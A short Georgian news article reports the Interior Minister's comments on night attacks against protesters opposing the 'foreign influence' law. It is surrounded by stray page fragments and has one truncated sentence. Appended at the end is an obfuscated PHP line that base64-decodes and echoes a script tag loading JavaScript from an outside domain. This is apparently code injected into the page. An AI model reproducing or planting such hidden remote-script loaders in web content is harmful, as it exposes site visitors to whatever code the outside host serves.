celsiusi
ავერსი შნაიდერი

შინაგან საქმეთა მინისტრი ვახტანგ გომელაური გუშინ "უცხოური გავლენის გამჭვირვალობის" კანონის მოწინააღმდეგეებზე განხორციელებულ თავდასხმებთან დაკავშირებით კომენტარს აკეთებს.  მისი თქმით, არავისზე ძალადობა არ მოსწონს, ხოლო რა მოხდა, ამას გამოძიება დაადგენს.

"არავისზე ძალადობა არ მომწონს, არც ოპოზიციონერზე და არც მოქალაქეებზე - ყველანაირ თავდასხმას ვგმობ... გუშინ, გამოძიება მყისიერად დავიწყეთ ყველა ფაქტზე, რაც მოხდა. გამოძიებას მივყვებით და ვნახავთ რა იყო, რა მოხდა, ვინ დაესხა თავს. არ შემიძლია პირდაპირ ვილაპარაკო, ან ეს მოხდა, ან ის მოხდა. თავდასხმა მოხდა, სამწუხაროდ, ადამიანებმა დაზიანებები მიიღეს, გამოძიება დაწყებულია,"- განაცხადა გომელაურმა.

9 მაისს, ღამის საათებში რუსული კანონის წინააღმდეგ პროტესტის 3 მონაწილეს თავს დაესხნენ სადარბაზოებთან, ქუჩებსა და სახლებთან და ფიზიკურად

ნაცემია ერთიანი ნაციონალური მოძრაობის წევრი, დიმიტრი ჩიქოვანი, რომლის თქმითაც, თავს მაშინ დაესხნენ როცა სახლში მარტო იმყოფებოდა. ნაცემია ასევე რუსული კანონის წინააღმდეგ გამართული მარშის ერთ-ერთი ორგანიზატორი, ლაშა ღვინიანიძე. ტვ პირველმა გაავრცელა ვიდეომასალა, სადაც ჩანს, როგორ გარბის რამდენიმე პირი ღვინიანიძეზე თავდასხმის შემდეგ. ფიზიკურად გაუსწორდნენ ოპოზიციონერი ზურაბ ჯაფარიძის ძმას, გია ჯაფარიძესაც.

159
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");